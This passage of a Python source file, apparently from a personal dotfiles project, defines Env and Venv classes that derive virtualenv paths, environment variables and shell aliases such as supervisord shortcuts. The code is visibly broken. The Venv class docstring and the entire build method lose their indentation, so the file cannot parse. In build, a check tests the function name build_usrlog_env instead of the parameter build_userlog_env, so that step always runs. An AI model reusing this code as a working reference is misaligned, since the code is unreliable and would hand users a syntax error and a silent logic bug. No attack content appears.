        # supervisord/supervisorctl aliases bound to $_SVCFG
        _SVCFG = env.get('_SVCFG', joinpath(env['_ETC'], 'supervisord.conf'))
        if os.path.exists(_SVCFG) or dont_reflect:
            env['_SVCFG'] = _SVCFG
            env['_SVCFG_'] = ' -c %s' % shell_quote(env['_SVCFG'])
        else:
            logging.error('supervisord configuration %r not found' % _SVCFG)
            env['_SVCFG_'] = ''
        aliases = env.aliases
        aliases['ssv'] = 'supervisord -c "${_SVCFG}"'
        aliases['sv'] = 'supervisorctl -c "${_SVCFG}"'
        aliases['svt'] = 'sv tail -f'
        aliases['svd'] = ('supervisorctl -c "${_SVCFG}" restart dev'
                          ' && supervisorctl -c "${_SVCFG}" tail -f dev')
        return env

    # run the steps in order; each receives and returns env
    funcs = [
        build_editor_env,
        build_ipython_env,
        build_grin_env,
        build_wrd_aliases_env,
        build_python_testing_env,
        build_pyramid_env,
        build_supervisord_env]
    builder = StepBuilder(env)
    for func in funcs:
        builder.add_step(func)
    return builder.build()
def build_usrlog_env(env=None,
                     _TERM_ID=None,
                     shell='bash',
                     prefix=None,
                     USER=None,
                     HOSTNAME=None,
                     lookup_hostname=False,
                     **kwargs):
    """
    Build environment variables and configuration like usrlog.sh

    Keyword Args:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
        _TERM_ID (str): terminal identifier string
        shell (str): shell name ("bash", "zsh")
        prefix (str): a path prefix (e.g. ``$VIRTUAL_ENV`` or ``$PREFIX``)
        USER (str): system username (``$USER``) for ``HISTTIMEFORMAT``
        HOSTNAME (str): system hostname (``HOSTNAME``) for ``HISTTIMEFORMAT``
        lookup_hostname (bool): if True, ``HOSTNAME`` is None,
            and not env.get('HOSTNAME'), try to read ``HOSTNAME``
            from ``os.environ`` and then ``socket.gethostname()``.
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
            with ``HOME``, ``__WRK``, and ``_USRLOG`` set

    .. note:: Like ``usrlog.sh``, when ``HISTTIMEFORMAT`` is set,
       ``USER`` and ``HOSTNAME`` must be evaluated.
       (When ``USER`` and ``HOSTNAME`` change, ``HISTTIMEFORMAT``
       is not updated, and the .history file will contain only
       the most recent USER and HOSTNAME settings,
       which are not necessarily the actual USER and HOSTNAME.)
       TODO: could/should instead (also) write USER and HOSTNAME
       to -usrlog.log.

    .. note:: the ``_TERM_ID``, ``shell``, ``USER``, ``HOSTNAME``, and
       ``lookup_hostname`` arguments are currently unused: the code that
       consumed them is retained below as commented-out scaffolding
       mirroring ``usrlog.sh``.
    """
    if env is None:
        env = Env()
    env['HOME'] = env.get('HOME', os.path.expanduser('~'))
    env['__WRK'] = env.get('__WRK',
                           get___WRK_default(env=env))
    #env['HOSTNAME'] = HOSTNAME
    #env['USER'] = USER
    #HOSTNAME = env.get('HOSTNAME')
    # if HOSTNAME is None:
    #     if lookup_hostname:
    #HOSTNAME = os.environ.get('HOSTNAME')
    # if HOSTNAME is None:
    #HOSTNAME = __import__('socket').gethostname()
    #env['HOSTNAME'] = HOSTNAME
    # env['HISTTIMEFORMAT'] = '%F %T%z {USER} {HOSTNAME} '.format(
    #    USER=env.get('USER','-'),
    #    HOSTNAME=env.get('HOSTNAME','-'))
    #env['HISTSIZE'] = 1000000
    #env['HISTFILESIZE'] = 1000000
    # user default usrlog
    # env['__USRLOG'] = joinpath(env['HOME'], '-usrlog.log')
    # current usrlog
    # default the usrlog prefix to $VENVPREFIX/$VIRTUAL_ENV, then $HOME
    if prefix is None:
        prefix = env.get('VENVPREFIX', env.get('VIRTUAL_ENV'))
    if prefix in (None, "/"):
        prefix = env.get('HOME', os.path.expanduser('~'))
    env['_USRLOG'] = joinpath(prefix, "-usrlog.log")
    #_term_id = _TERM_ID if _TERM_ID is not None else (
    #    term_id_from_environ and os.environ.get('_TERM_ID'))
    #if _term_id:
    #    env['_TERM_ID'] = _term_id
    #    env['_TERM_URI'] = _TERM_ID  # TODO
    # shell HISTFILE
    # if shell == 'bash':
    #env['HISTFILE'] = joinpath(prefix, ".bash_history")
    # elif shell == 'zsh':
    #env['HISTFILE'] = joinpath(prefix, ".zsh_history")
    # else:
    #env['HISTFILE'] = joinpath(prefix, '.history')
    return env
def build_venv_activate_env(env=None,
                            VENVSTR=None,
                            VENVSTRAPP=None,
                            from_environ=False,
                            VENVPREFIX=None,
                            VIRTUAL_ENV=None,
                            VIRTUAL_ENV_NAME=None,
                            _APP=None,
                            _SRC=None,
                            _WRD=None,
                            **kwargs):
    """
    Derive the core venv activation variables
    (``_APP``, ``_ETC``, ``_SRC``, ``_WRD``) from a parsed ``VENVSTR``.

    Keyword Args:
        env (Env dict): :py:class:`Env` (default: None (a new Env()))
        VENVSTR (str): venv name or path (default: None)
        VENVSTRAPP (str): app path within the venv (default: None)
        from_environ (bool): read values from ``os.environ`` (default: False)
        VENVPREFIX (str): venv prefix path (default: None)
        VIRTUAL_ENV (str): path to a VIRTUAL_ENV (default: None)
        VIRTUAL_ENV_NAME (str): basename of the VIRTUAL_ENV (default: None)
        _APP (str): app path component (default: None)
        _SRC (str): venv src path (default: None)
        _WRD (str): working directory path (default: None)
    Returns:
        env (Env dict): :py:class:`Env`; unchanged beyond ``__WRK``
        when no ``VIRTUAL_ENV`` could be determined
    """
    env = Env() if env is None else env
    keynames = (
        'VENVPREFIX',
        'VENVSTR',
        'VENVSTRAPP',
        'VIRTUAL_ENV',
        'VIRTUAL_ENV_NAME',
        '_APP',
        '_SRC',
        '_WRD',
    )

    def lookup(attr, default=None):
        return lookup_from_kwargs_env(kwargs, env, attr, default=default)

    # copy any explicitly-passed keyword values into kwargs, then
    # (re)resolve every key through the kwargs/env lookup chain
    frame_locals = vars()
    for keyname in keynames:
        argvalue = frame_locals.get(keyname)
        if argvalue is not None:
            kwargs[keyname] = argvalue
        env[keyname] = lookup(keyname)
    env = Venv.parse_VENVSTR(env=env,
                             from_environ=from_environ,
                             **kwargs)
    env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
    virtualenv = env.get('VIRTUAL_ENV')
    if virtualenv is None:
        # without a VIRTUAL_ENV there is nothing further to derive
        return env
    venv_name = env.get('VIRTUAL_ENV_NAME')
    app = env.get('_APP')
    if app is None:
        app = venv_name if venv_name is not None else ""
    env['_APP'] = app
    etc = env.get('_ETC')
    if etc is None:
        etc = joinpath(env['VIRTUAL_ENV'], 'etc')
    env['_ETC'] = etc
    src = env.get('_SRC')
    if src is None:
        src = joinpath(env['VIRTUAL_ENV'], 'src')
    env['_SRC'] = src
    wrd = env.get('_WRD')
    if wrd is None:
        wrd = joinpath(env['_SRC'], env['_APP'])
    env['_WRD'] = wrd
    return env
class Env(object):
    """
    OrderedDict of variables for/from ``os.environ``,
    plus an ``aliases`` OrderedDict of shell/IPython aliases.
    """
    # Comment example paths have a trailing slash,
    # test and actual paths should not have a trailing slash
    # from os.path import join as joinpath
    osenviron_keys_classic = (
        # editors
        'VIMBIN',
        'GVIMBIN',
        'MVIMBIN',
        'GUIVIMBIN',
        'VIMCONF',
        'EDITOR',
        'EDITOR_',
        'PAGER',
        # venv
        '__WRK',  # ~/-wrk/
        '__DOTFILES',
        # virtualenvwrapper
        'PROJECT_HOME',  # ~/-wrk/ #$__WRK
        'WORKON_HOME',  # ~/-wrk/-ve27/
        'WORKON_HOME__py27',  # ~/-wrk/-ve27/
        'WORKON_HOME__py34',  # ~/-wrk/-ve34/
        # venv
        # ~/-wrk/-ve27/dotfiles/ # ${VENVPREFIX:-${VIRTUAL_ENV}}
        'VENVPREFIX',
        'VENVSTR',  # "dotfiles"
        'VENVSTRAPP',  # "dotfiles", "dotfiles/docs"
        '_APP',  # dotfiles/tests
        'VIRTUAL_ENV_NAME',  # "dotfiles"
        # virtualenv
        'VIRTUAL_ENV',  # ~/-wrk/-ve27/dotfiles/ # ${VIRTUAL_ENV_NAME}
        # venv
        '_SRC',  # ~/-wrk/-ve27/dotfiles/src/ # ${VIRTUAL_ENV}/src
        '_ETC',  # ~/-wrk/-ve27/dotfiles/etc/ # ${VIRTUAL_ENV}/etc
        '_BIN',
        '_CFG',
        '_LIB',
        '_LOG',
        '_MNT',
        '_OPT',
        '_PYLIB',
        '_PYSITE',
        '_SRV',
        '_VAR',
        '_WRD',
        '_WRD_SETUPY',
        '_WWW',
        # dotfiles
        '__SRC',
        '__DOCSWWW',
        # usrlog
        '_USRLOG',
        '__USRLOG',
        '_TERM_ID',
        '_TERM_URI',
    )
    # default key ordering and example/default value templates
    osenviron_keys = OrderedDict((
        ## <env>
        # ("HOME", "/Users/W"),
        ("__WRK", "${HOME}/-wrk"),
        ("__SRC", "${__WRK}/-src"),
        ("__DOTFILES", "${HOME}/-dotfiles"),
        # (a duplicate ("__WRK", "${HOME}/-wrk") entry was removed here)
        #("PROJECT_HOME", "${HOME}/-wrk"),
        ("PROJECT_HOME", "${__WRK}"),
        ("CONDA_ROOT", "${__WRK}/-conda27"),
        ("CONDA_ENVS_PATH", "${__WRK}/-ce27"),
        ("WORKON_HOME", "${__WRK}/-ve27"),
        ("VENVSTR", "dotfiles"),
        ("VENVSTRAPP", "dotfiles"),  # or None
        ("VIRTUAL_ENV_NAME", "dotfiles"),
        ("VIRTUAL_ENV", "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"),
        ("VENVPREFIX", "${VIRTUAL_ENV}"),  # or /
        ("_APP", "dotfiles"),
        ("_ETC", "${VIRTUAL_ENV}/etc"),
        ("_SRC", "${VIRTUAL_ENV}/src"),
        ("_WRD", "${_SRC}/dotfiles"),
        ("_BIN", "${VIRTUAL_ENV}/bin"),
        ("_ETCOPT", "${_ETC}/opt"),
        ("_HOME", "${VIRTUAL_ENV}/home"),
        ("_LIB", "${VIRTUAL_ENV}/lib"),
        ("_PYLIB", "${_LIB}/python2.7"),
        ("_PYSITE", "${_PYLIB}/site-packages"),
        ("_MNT", "${VIRTUAL_ENV}/mnt"),
        ("_MEDIA", "${VIRTUAL_ENV}/media"),
        ("_OPT", "${VIRTUAL_ENV}/opt"),
        ("_ROOT", "${VIRTUAL_ENV}/root"),
        ("_SBIN", "${VIRTUAL_ENV}/sbin"),
        ("_SRV", "${VIRTUAL_ENV}/srv"),
        ("_TMP", "${VIRTUAL_ENV}/tmp"),
        ("_USR", "${VIRTUAL_ENV}/usr"),
        ("_USRBIN", "${VIRTUAL_ENV}/usr/bin"),
        ("_USRINCLUDE", "${VIRTUAL_ENV}/usr/include"),
        ("_USRLIB", "${VIRTUAL_ENV}/usr/lib"),
        ("_USRLOCAL", "${VIRTUAL_ENV}/usr/local"),
        ("_USRLOCALBIN", "${VIRTUAL_ENV}/usr/local/bin"),
        ("_USRSBIN", "${VIRTUAL_ENV}/usr/sbin"),
        ("_USRSHARE", "${VIRTUAL_ENV}/usr/share"),
        ("_USRSRC", "${VIRTUAL_ENV}/usr/src"),
        ("_VAR", "${VIRTUAL_ENV}/var"),
        ("_VARCACHE", "${_VAR}/cache"),
        ("_VARLIB", "${_VAR}/lib"),
        ("_VARLOCK", "${_VAR}/lock"),
        ("_LOG", "${_VAR}/log"),
        ("_VARMAIL", "${_VAR}/mail"),
        ("_VAROPT", "${_VAR}/opt"),
        ("_VARRUN", "${_VAR}/run"),
        ("_VARSPOOL", "${_VAR}/spool"),
        ("_VARTMP", "${_VAR}/tmp"),
        ("_WWW", "${_VAR}/www"),
        ("WORKON_HOME__py27", "${__WRK}/-ve27"),
        ("WORKON_HOME__py34", "${__WRK}/-ve34"),
        ("WORKON_HOME__py35", "${__WRK}/-ve35"),
        ("WORKON_HOME__py36", "${__WRK}/-ve36"),
        ("WORKON_HOME__py37", "${__WRK}/-ve37"),
        ("WORKON_HOME_DEFAULT", "WORKON_HOME__py37"),
        ("CONDA_ROOT__py27", "${__WRK}/-conda27"),
        ("CONDA_ENVS__py27", "${__WRK}/-ce27"),
        ("CONDA_ROOT__py34", "${__WRK}/-conda34"),
        ("CONDA_ENVS__py34", "${__WRK}/-ce34"),
        ("CONDA_ROOT__py35", "${__WRK}/-conda35"),
        ("CONDA_ENVS__py35", "${__WRK}/-ce35"),
        ("CONDA_ROOT__py36", "${__WRK}/-conda36"),
        ("CONDA_ENVS__py36", "${__WRK}/-ce36"),
        ("CONDA_ROOT__py37", "${__WRK}/-conda37"),
        ("CONDA_ENVS__py37", "${__WRK}/-ce37"),
        #("CONDA_ROOT_DEFAULT", "CONDA_ROOT__py27"),
        #("CONDA_ENVS_DEFAULT", "CONDA_ENVS__py27"),
        #("PROJECT_FILES", ""),
        #("VIMBIN", "/usr/bin/vim"),
        #("GVIMBIN", "/usr/local/bin/gvim"),
        #("MVIMBIN", "/usr/local/bin/mvim"),
        #("GUIVIMBIN", "/usr/local/bin/gvim"),
        #("VIMCONF", "--servername dotfiles"),
        #("_EDIT_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent"),
        #("EDITOR_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent"),
        #("_NOTEBOOKS", "${_SRC}/notebooks"),
        #("_IPYSESKEY", "${_SRC}/.ipyseskey"),
        #("_IPQTLOG", "${VIRTUAL_ENV}/.ipqt.log"),
        #("_WRD_SETUPY", "${_WRD}/setup.py"),
        #("_TEST_", "(cd {_WRD} && python \"${_WRD_SETUPY}\" test)"),
        #("_CFG", "${_ETC}/development.ini"),
        #("_EDITCFG_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent ${_ETC}/development.ini"),
        #("_SHELL_", "(cd {_WRD} && \"${_BIN}\"/pshell \"${_CFG}\")"),
        #("_SERVE_", "(cd {_WRD} && \"${_BIN}\"/pserve --app-name=main --reload --monitor-restart \"${_CFG}\")"),
        #("_SVCFG", "${_ETC}/supervisord.conf"),
        #("_SVCFG_", " -c \"${_ETC}/supervisord.conf\""),
        #("__USRLOG", "${HOME}/-usrlog.log"),
        #("_USRLOG", "${VIRTUAL_ENV}/-usrlog.log"),
    ))

    def __init__(self, *args, **kwargs):
        """
        Initialize the Env; args/kwargs initialize ``self.environ``.

        Keyword Args:
            name (str): optional name for this Env (used in log messages)
        """
        if 'name' in kwargs:
            self._name = kwargs.pop('name', None)
        self.environ = OrderedDict(*args, **kwargs)
        self.aliases = OrderedDict()
        self.logevent('env', "__init__")

    @property
    def name(self):
        # default to the instance id (hex) when no name was given
        return getattr(self, '_name', str(hex(id(self))))

    def logevent(self, *args, **kwargs):
        """Log an event, prefixing 'env…' messages with this Env's name."""
        #kwargs['logger'] = self.log
        args = list(args)
        if args[0].startswith('env'):
            args[0] = 'env {} {}'.format(
                self.name,
                args[0][3:])
        return logevent(*args, **kwargs)

    def __setitem__(self, k, v):
        # log every environment variable assignment
        self.logevent("envexport", "{}={}".format(k, v))
        return self.environ.__setitem__(k, v)

    def __getitem__(self, k, *args, **kwargs):
        # log lookups (and lookup failures) before returning/raising
        try:
            v = self.environ.__getitem__(k, *args, **kwargs)
            self.logevent("env[k] ", "{}={}".format(k, repr(v)))
            return v
        except Exception as e:
            self.logevent("env[k] ", "{}={}".format(k, e))
            raise

    def __contains__(self, k):
        return self.environ.__contains__(k)

    def __iter__(self, *args, **kwargs):
        return self.environ.__iter__(*args, **kwargs)

    def iterkeys(self):
        """Iterate 'HOME', the default keys, then any extra environ keys,
        de-duplicated while preserving order."""
        keys = self.osenviron_keys.keys()
        allkeys = OrderedDict.fromkeys(
            itertools.chain(['HOME'],
                            keys,
                            self.environ.keys()))
        return allkeys.keys()

    def iteritems_environ(self):
        """Yield ``(key, value)`` pairs for keys present in ``environ``."""
        for key in self.iterkeys():
            if key in self.environ:
                yield (key, self.environ.get(key))

    def iteritems(self):
        """Yield ``('environ', dict)`` and ``('aliases', dict)`` pairs."""
        yield ('environ', OrderedDict(self.iteritems_environ()))
        yield ('aliases', self.aliases)

    def get(self, k, default=None):
        return self.environ.get(k, default)

    def copy(self):
        """Return a deep copy of this Env."""
        self.logevent('env.copy', level=logging.DEBUG)
        return copy.deepcopy(self)

    def __eq__(self, env):
        # Envs compare by environ+aliases; plain mappings by environ only
        if isinstance(env, Env):
            return ((self.environ == env.environ) and (
                self.aliases == env.aliases))
        elif hasattr(env, 'keys'):
            return self.environ == env
        return False

    @classmethod
    def from_environ(cls, environ, verbose=False):
        """
        Build an ``Env`` from a dict (e.g. ``os.environ``)

        Args:
            environ (dict): a dict with variable name keys and values
            verbose (bool): whether to be verbose about dict merging
        Returns:
            Env: an Env environment built from the given environ dict
        """
        env = cls((k, environ.get(k, '')) for k in cls.osenviron_keys)
        logevent('env.from_environ',
                 env,  # OrderedDict(environ).items(), indent=2),
                 wrap=True,
                 splitlines=True,
                 level=logging.DEBUG)
        return env

    def compress_paths(self, path_, keys=None, keyname=None):
        """
        Given an arbitrary string,
        replace absolute paths (starting with '/')
        with the longest matching Env path variables.

        Args:
            path_ (str): a path string
        Keyword Args:
            keys (list): explicit key order to try (default: None
                (default keys reversed, then any extra environ keys))
            keyname (str): the name of the key being compressed;
                skipped when substituting VENVSTRAPP/VENVSTR
        Returns:
            str: path string containing ``${VARNAME}`` variables
        """
        if keys is not None:
            keylist = keys
        else:
            #keys_longest_to_shortest
            keydict = self.osenviron_keys.copy()
            other_keys = [x for x in self.environ if x not in keydict]
            default_keys = (list(keydict) +
                            ['VIRTUAL_ENV', '_SRC', '_ETC', '_WRD'])
            keylist = default_keys[::-1] + other_keys
        if not isinstance(path_, STR_TYPES):
            return path_
        _path = path_
        for varname in keylist:
            value = self.environ.get(varname)
            if isinstance(value, STR_TYPES) and value.startswith('/'):
                _path = _path.replace(value + "/", '${%s}/' % varname)
        for varname in ['VENVSTRAPP', 'VENVSTR']:
            if keyname == varname:
                continue
            value = self.environ.get(varname)
            if isinstance(value, STR_TYPES):
                if value in _path:
                    _path = _path.replace(value, '${%s}' % varname)
        return _path

    def to_string_iter(self, **kwargs):
        """Yield ``NAME=repr(value)`` lines (optionally path-compressed)."""
        yield '## <env>'
        compress_paths = kwargs.get('compress_paths')
        for name, value in self.iteritems_environ():
            if compress_paths:
                value = self.compress_paths(value, keyname=name)
            yield "{name}={value}".format(name=name, value=repr(value))
        yield '## </env>'

    def __str__(self):
        #return u'\n'.join(self.to_string_iter())
        return self.to_json(indent=2)

    def __repr__(self):
        # (unreachable fallback returns after this statement were removed)
        return "<Env: len=%d>" % len(self.environ)

    def ndiff(self, other_env):
        """
        Args:
            other_env (Env): env to compare with
        Returns:
            iterable: strings from :py:func:`difflib.unified_diff`
        """
        if not hasattr(other_env, 'to_string_iter'):
            raise AttributeError('can only compare envs with envs')
        return difflib.unified_diff(
            list(self.to_string_iter()),
            list(other_env.to_string_iter()))

    def to_dict(self):
        return OrderedDict(self.iteritems())

    def to_json(self, *args, **kwargs):
        """Serialize to JSON with :py:class:`VenvJSONEncoder`."""
        _dict = self.to_dict()
        try:
            jsonstr = json.dumps(_dict, *args, cls=VenvJSONEncoder, **kwargs)
            return jsonstr
        except Exception:
            # dump the structure for debugging before re-raising
            print('\n\n\n\n\n')
            print(pprint.pformat(_dict))
            raise
def shell_quote(var):
    """
    Escape single quotes and add double quotes around a given variable.

    Args:
        var (object): value to quote (its ``repr`` is used)
    Returns:
        str: ``repr`` of ``var`` wrapped in double quotes

    .. warning:: This is not safe for untrusted input and only valid
       in this context (``os.environ``).
    """
    _repr = repr(var)
    if _repr.startswith('\''):
        return "\"%s\"" % _repr[1:-1]
    # BUG FIX: previously fell through and implicitly returned None when
    # repr() chose double quotes (e.g. a string containing a single quote)
    # or the value was not a string; return the repr unchanged instead.
    return _repr
def shell_varquote(str_):
    """
    Wrap a variable name in shell ``${}`` brackets and double quotes.

    Args:
        str_ (str): variable name to varquote (e.g. ``VIRTUAL_ENV``)
    Returns:
        str: e.g. ``"${VIRTUAL_ENV}"``
    """
    varref = '${%s}' % str_
    return shell_quote(varref)
def _get_shell_version():
    """
    Determine the name and version of the current ``$SHELL``.

    Returns:
        tuple: ``(shell_namestr, versionstr)`` for bash,
        a two-item list for zsh,
        or None if the shell is not recognized
    Raises:
        Exception: if ``$SHELL`` is not set
    """
    shell = os.environ.get('SHELL')
    if not shell:
        raise Exception('SHELL is not set')
    output = subprocess.check_output(
        (shell, '--version'))
    if not isinstance(output, str):
        # BUG FIX: on Python 3, check_output returns bytes;
        # splitting with a str separator would raise TypeError
        output = output.decode('utf-8', 'replace')
    firstline = output.split('\n', 1)[0]
    bash_prefix = 'GNU bash, version '
    if firstline.startswith(bash_prefix):
        # BUG FIX: str.lstrip(prefix) strips a *character set*, not a
        # prefix string; slice off the prefix length instead
        return ('bash', firstline[len(bash_prefix):])
    if firstline.startswith('zsh '):
        return firstline.split(' ', 1)
def _shell_supports_declare_g():
    """
    Returns:
        bool: True only if the ``$SHELL`` is known to support ``declare -g``
    """
    # NOTE: OSX still has bash 3.2, which does not support '-g'
    shellver = _get_shell_version()
    if not shellver:
        # unrecognized shell (BUG FIX: previously raised on unpacking None)
        return False
    shell, verstr = shellver
    if shell == 'zsh':
        return True
    if shell == 'bash':
        # BUG FIX: the previous verstr.startswith('4') check rejected
        # bash 5.x; accept any major version >= 4 (matching the original's
        # acceptance of all 4.x)
        try:
            major = int(verstr.split('.', 1)[0])
        except ValueError:
            return False
        return major >= 4
    return False
class Venv(object):
"""
A virtual environment configuration generator
"""
    def __init__(self,
                 VENVSTR=None,
                 VENVSTRAPP=None,
                 __WRK=None,
                 __DOTFILES=None,
                 WORKON_HOME=None,
                 VIRTUAL_ENV_NAME=None,
                 VENVPREFIX=None,
                 VIRTUAL_ENV=None,
                 _SRC=None,
                 _APP=None,
                 _WRD=None,
                 env=None,
                 from_environ=False,
                 open_editors=False,
                 open_terminals=False,
                 dont_reflect=True,
                 debug=False,
                 show_diffs=False,
                 **kwargs):
        """
        Initialize a new Venv from a default configuration

        Keyword Arguments:
            env (Env): initial Env
            VENVSTR (str): VIRTUAL_ENV_NAME ('dotfiles') or VIRTUAL_ENV
                ('$WORKON_HOME/dotfiles')
            VENVSTRAPP (str): _APP ('dotfiles', 'dotfiles/etc/bash')
            __WRK (str): None (~/-wrk) OR
                path to a workspace root
                containing one or more ``WORKON_HOME`` directories

                .. code:: bash

                    test $__WRK == echo "${HOME}/-wrk"
                    cdwrk

            __DOTFILES (str): None or path to dotfiles symlink

                .. code:: bash

                    test "${__DOTFILES}" == "~/-dotfiles"
                    cddotfiles ; cdd

            WORKON_HOME (str): path to a ``WORKON_HOME`` directory
                containing zero or more 'VIRTUAL_ENV`` directories

                .. code:: bash

                    test $WORKON_HOME == echo "${__WRK}/-ve27"
                    cdworkonhome ; cdwh

            VIRTUAL_ENV_NAME (str): None or a string path component

                .. code:: bash

                    test "$VIRTUAL_ENV" == "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"
                    cdvirtualenv ; cdv

                .. note:: if None (not specified),
                    ``VIRTUAL_ENV_NAME`` defaults to
                    the basename of ``$VIRTUAL_ENV``
                    or what is in ``os.environ``, if ``from_environ`` is True)

            VENVPREFIX (str): for when VIRTUAL_ENV is not set {/,~,~/-wrk}
                some paths may not make sense with PREFIX=/.
                #TODO: list sensible defaults
                # the issue here is whether to raise an error when
                VENVSTR or VIRTUAL_ENV are not specified.
            VIRTUAL_ENV (str): None, a path to a virtualenv, or the basename
                of a virtualenv in ``$WORKON_HOME``

                .. code:: bash

                    test "$VIRTUAL_ENV" == "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"
                    cdvirtualenv ; cdv

                .. note:: if not specified,
                    ``$_APP`` defaults to the basename of ``$VIRTUAL_ENV``
                    (or what is in os.environ, if ``from_environ`` is True)

            _SRC (str): None or a string path component

                .. code:: bash

                    test "$_SRC" == "${VIRTUAL_ENV}/src"
                    cdsrc ; cds

            _APP (str): None or a string path component

                .. code:: bash

                    test "${_SRC}/${_APP}" == "${_WRD}"
                    cdwrd ; cdw

                .. note:: if not specified,
                    ``$_APP`` defaults to the basename of ``$VIRTUAL_ENV``
                    (or what is in os.environ, if ``from_environ`` is True)

            _WRD (str): None or path to working directory

                .. code:: bash

                    test "${_SRC}/${_APP}" == "${_WRD}"
                    cdwrd ; cdw

            env (Env): an initial Env with zero or more values for self.env
                (default: None)
            from_environ (bool): read self.env from ``os.environ``
                (default: False)
            open_editors (bool): Open an editor with Venv.project_files
                (default: False)
            open_terminals (bool): Open terminals for the Venv
                (default: False)
            dont_reflect (bool): Always create aliases and functions
                referencing ``$_WRD`` even if ``$_WRD`` doesn't exist.
                (default: True)

        Raises:
            Exception: if both ``env`` and ``from_environ=True`` are specified
            Exception: if VIRTUAL_ENV is not specified or incalculable
                from the given combination of
                ``virtualenv`` and ``from_environ`` arguments
        """
        if from_environ:
            if env is None:
                env = Env.from_environ(os.environ)
            else:
                raise Exception(
                    "both 'env' and 'from_environ=True' were specified")
        if env is None:
            env = Env()
        # the named path/venv keyword arguments, in resolution order
        keys = [
            'VENVSTR',
            'VENVSTRAPP',
            '__WRK',
            '__DOTFILES',
            'WORKON_HOME',
            'VIRTUAL_ENV',
            'VENVPREFIX',
            '_APP',
            'VIRTUAL_ENV_NAME',
            '_SRC',
            '_WRD']
        # NOTE(review): this rebinds ``kwargs``, discarding any extra
        # **kwargs passed by the caller before the lookups below --
        # confirm intentional
        kwargs = OrderedDict()

        def lookup(attr, default=None):
            return lookup_from_kwargs_env(kwargs, env, attr, default=default)

        # copy any explicitly-passed keyword values into kwargs, then
        # (re)resolve every key through the kwargs/env lookup chain
        _SENTINEL = None
        _vars = vars()
        for key in keys:
            value = _vars.get(key, _SENTINEL)
            if value is not _SENTINEL:
                kwargs[key] = value
            env[key] = lookup(key)
        VENVSTR = env.get('VENVSTR')
        if VENVSTR:
            env = Venv.parse_VENVSTR(env=env,
                                     from_environ=from_environ,
                                     **kwargs)
        self.env = env
        # run the step pipeline; keep the last built env
        built_envs = self.build(env=env,
                                from_environ=from_environ,
                                dont_reflect=dont_reflect,
                                debug=debug,
                                show_diffs=show_diffs)
        if not built_envs:
            raise ConfigException(built_envs)
        self.env = built_envs[-1]
        if open_editors:
            self.open_editors()
        if open_terminals:
            self.open_terminals()
def build(self,
env=None,
VENVSTR=None,
VENVSTRAPP=None,
VENVPREFIX=None,
from_environ=False,
dont_reflect=True,
debug=False,
show_diffs=False,
build_user_aliases=False,
build_userlog_env=False,
):
"""
Build :py:class:`Venv` :py:class:`Steps` with :py:class:`StepBuilder`
"""
conf = OrderedDict()
if VENVSTR is not None:
conf['VENVSTR'] = VENVSTR
if VENVSTRAPP is not None:
conf['VENVSTRAPP'] = VENVSTRAPP
if VENVPREFIX is not None:
conf['VENVPREFIX'] = VENVPREFIX
conf.update({
'from_environ': from_environ,
'dont_reflect': dont_reflect,
'debug': debug,
'show_diffs': show_diffs,
})
builder = StepBuilder(conf=conf)
builder.add_step(PrintEnvStderrStep)
builder.add_step(build_dotfiles_env)
builder.add_step(build_virtualenvwrapper_env)
builder.add_step(build_venv_activate_env)
builder.add_step(build_conda_env)
builder.add_step(build_conda_cfg_env)
builder.add_step(build_venv_activate_env)
builder.add_step(build_venv_paths_full_env)
builder.add_step(build_venv_paths_cdalias_env)
# if you would like to fork, fork.
# if you would like to submit a patch or a pull request, please do.
if build_user_aliases:
builder.add_step(build_user_aliases_env)
if build_usrlog_env:
builder.add_step(build_usrlog_env)
logevent('Venv.build',
dict(env=env, conf=conf),
wrap=True,
level=logging.DEBUG)
new_env = builder.build(env=env)
#logevent('Venv.build', dict(env=env, conf=conf), wrap=True, level=logging.INFO)
return new_env
    @staticmethod
    def parse_VENVSTR(env=None,
                      VENVSTR=None,
                      VENVSTRAPP=None,
                      VENVPREFIX=None,
                      VIRTUAL_ENV=None,
                      VIRTUAL_ENV_NAME=None,
                      _APP=None,
                      _SRC=None,
                      _WRD=None,
                      __WRK=None,
                      WORKON_HOME=None,
                      from_environ=False,
                      **kwargs):
        """
        Get the path to a virtualenv given a ``VENVSTR``

        Keyword Arguments:
            env (Env): initial Env (default: None (a new Env()))
            VENVSTR (str): a path to a virtualenv containing ``/``
                OR just the name of a virtualenv in ``$WORKON_HOME``
            VENVSTRAPP (str): app path within the venv
                (e.g. 'dotfiles' or 'dotfiles/docs')
            VENVPREFIX (str): venv prefix path (defaults to VIRTUAL_ENV)
            VIRTUAL_ENV (str): explicit path to a virtualenv
            VIRTUAL_ENV_NAME (str): basename of the virtualenv
            _APP (str): app path component
            _SRC (str): venv src path
            _WRD (str): working directory path
            __WRK (str): workspace root path
            WORKON_HOME (str): directory containing virtualenvs
                (default: :py:func:`get_WORKON_HOME_default`)
            from_environ (bool): whether to try and read from
                ``os.environ["VIRTUAL_ENV"]``
        Returns:
            Env: env with WORKON_HOME, VENVSTR, VENVSTRAPP, _APP,
            VIRTUAL_ENV_NAME, VENVPREFIX, and VIRTUAL_ENV set
        Raises:
            ConfigException: if ``from_environ=True`` is combined with
                any of VENVSTR, VENVSTRAPP, VENVPREFIX
        """
        _vars = vars()
        keys = [
            '__WRK',
            'WORKON_HOME',
            'VENVSTR',
            'VENVSTRAPP',
            'VENVPREFIX',
            'VIRTUAL_ENV',
            'VIRTUAL_ENV_NAME',
            '_APP',
            '_SRC',
            '_WRD',
        ]
        if env is None:
            env = Env()
        if from_environ is True:
            if VENVSTR or VENVSTRAPP or VENVPREFIX:
                raise ConfigException(
                    "from_environ=True cannot be specified with any of "
                    "[VENVSTR, VENVSTRAPP, VENVPREFIX]")
            env = Env.from_environ(os.environ)

        def lookup(attr, default=None):
            return lookup_from_kwargs_env(kwargs, env, attr, default=default)

        # copy explicitly-passed keyword values into kwargs, then
        # (re)resolve every key through the kwargs/env lookup chain
        SENTINEL = None
        for key in keys:
            value = _vars.get(key, SENTINEL)
            if value is not SENTINEL:
                kwargs[key] = value
            env[key] = lookup(key)
